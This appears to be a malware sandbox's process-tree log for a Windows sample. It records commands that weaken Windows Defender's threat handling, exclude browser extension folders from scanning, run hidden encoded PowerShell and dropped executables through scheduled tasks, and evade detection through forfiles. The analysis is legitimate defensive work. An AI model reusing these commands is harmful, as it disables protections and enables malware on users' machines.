C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2752 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4248
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:72
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2308
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PkHXoyfIcMTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PkHXoyfIcMTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RJQEYlaXIdKEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RJQEYlaXIdKEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\isELTbHVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\isELTbHVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qUxPWOOJDmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qUxPWOOJDmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iUpcBoAnfROFusVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iUpcBoAnfROFusVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZHHcBHyHcybDeGrGE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZHHcBHyHcybDeGrGE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\aPfXqghswcuHVtsm\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\aPfXqghswcuHVtsm\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PkHXoyfIcMTU2" /t REG_DWORD /d 0 /reg:323⤵PID:1508
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PkHXoyfIcMTU2" /t REG_DWORD /d 0 /reg:324⤵PID:1640
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PkHXoyfIcMTU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RJQEYlaXIdKEC" /t REG_DWORD /d 0 /reg:323⤵PID:1396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RJQEYlaXIdKEC" /t REG_DWORD /d 0 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\isELTbHVU" /t REG_DWORD /d 0 /reg:323⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\isELTbHVU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qUxPWOOJDmUn" /t REG_DWORD /d 0 /reg:323⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qUxPWOOJDmUn" /t REG_DWORD /d 0 /reg:643⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wcWwepsXFbYvlLqpBMR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iUpcBoAnfROFusVB /t REG_DWORD /d 0 /reg:323⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iUpcBoAnfROFusVB /t REG_DWORD /d 0 /reg:643⤵PID:2468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZHHcBHyHcybDeGrGE /t REG_DWORD /d 0 /reg:323⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZHHcBHyHcybDeGrGE /t REG_DWORD /d 0 /reg:643⤵PID:3232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\aPfXqghswcuHVtsm /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\aPfXqghswcuHVtsm /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYvTQgZXi" /SC once /ST 06:46:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYvTQgZXi"2⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYvTQgZXi"2⤵
- System Location Discovery: System Language Discovery
PID:928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pihWnfNzBScFsSymW" /SC once /ST 04:15:18 /RU "SYSTEM" /TR "\"C:\Windows\Temp\aPfXqghswcuHVtsm\wcUhHWQGYwLkqOm\FkNsISq.exe\" VZ /jQFpdidQb 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pihWnfNzBScFsSymW"2⤵
- System Location Discovery: System Language Discovery
PID:4656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 14402⤵
- Program crash
PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3896
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:2328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1724
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3596
-
C:\Windows\Temp\aPfXqghswcuHVtsm\wcUhHWQGYwLkqOm\FkNsISq.exeC:\Windows\Temp\aPfXqghswcuHVtsm\wcUhHWQGYwLkqOm\FkNsISq.exe VZ /jQFpdidQb 385104 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
PID:3364 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3248 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:4120 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2876 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2856
-
